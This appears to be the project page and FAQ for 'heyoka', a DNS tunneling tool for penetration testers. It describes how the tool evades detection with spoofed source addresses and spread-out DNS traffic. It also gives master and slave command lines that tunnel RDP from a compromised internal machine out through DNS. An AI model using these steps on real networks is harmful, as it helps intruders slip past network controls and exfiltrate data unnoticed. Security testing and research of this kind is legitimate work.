About

"Heyoka are thought of as being backwards-forwards, upside-down, or contrary in nature. This spirit is often manifest by doing things backwards or unconventionally -- riding a horse backwards, wearing clothes inside-out, or speaking in a backwards language." (source Wikipedia)

Heyoka is a DNS tunneling tool aiming for both performance and stealth, released under the GPLv2.

The tunnel is up to 60% faster compared to existing tools, thanks to a different encoding that is used in the packets. Additionally, heyoka can spread traffic across multiple name servers and spoof the source addresses of other hosts within the network. This way, the traffic signature gets spread across the whole internal network, making the tunnel endpoint significantly harder to spot.

Heyoka is 100% written in C, which means that it runs natively without the need of interpreters installed on the machine, which is extremely useful in a penetration testing scenario.

The overall idea is to create a useful tunneling tool, and at the same time investigate new patterns of data exfiltration that use spoofed packets to avoid detection.

We presented heyoka at multiple conferences. Have a look at the slides from Shakacon if you want to get a bigger picture ... or just download and try! :)

Download

FAQ

What is the purpose of heyoka or a DNS tunnel anyway?

You might find yourself sitting in locked down network that only allows traffic to be send through an authenticated proxy or not even that. There's a good chance that DNS however will be routed through. In that case you can use DNS tunnels to send and receive arbitrary traffic from the "outside world". Alternatively, you might be in a penetration test, and you can run commands with administrative privileges on some machine deep inside the target network, that can only communicate with the outside world through DNS requests passed to the internal DNS server. In all these cases, a DNS tunnel can be a reliable (albeit not very fast) way to communicate.

How do I get heyoka to run?

At the moment, there is only one heyoka executable, which is capable of being both the 'master' and the 'slave'. Obviously, this will change in the future.

Start by running heyoka in master mode on the machine which is authoritative name server for the domain you are using. Assuming that you are going to contact some service listening on the other side (e.g.: RDP), the syntax will be as follows:

heyoka.exe -m -d mydomain.com -l -p 8080

This will start the fake DNS server, and create a local listening TCP socket on port 8080. Then start heyoka in slave mode on the internal/compromised machine with the following syntax:

heyoka.exe -s -d mydomain.com -p 3389

This will create the tunnel, and all you have to do is to fire off a RDP client and point it to the 'master' machine on port 8080.

If it's the internal/compromised machine that needs to contact a service on the external box, simply use '-l' (which stands for 'listen') on the master side instead. Keep in mind that the code is in alpha stage, so you might experience crashes and other unexpected behavior.

Which Operating Systems are currently supported?

At the moment heyoka has only been tested on Windows 2003. However, we plan to port the code to *nix operating systems in the near future...

What are your future plans with Heyoka?

The next steps will be to get it off the alpha state as soon as possible and make it a usable tool for everyone. We'll have to fix a lot of bugs, implement a fancy GUI and port it to some other operating systems. Then there are plans to make it available as DLL so that you can easily integrate it into your tool (Heyoka is licensed under the GPL). From there on, we shall see...

Can I contribute?

Sure you can. Just drop us an email.

Who are you?

Two security professionals with too much time in their hands:

Can I buy heyoka t-shirts or mugs?

errr ... no. At least not yet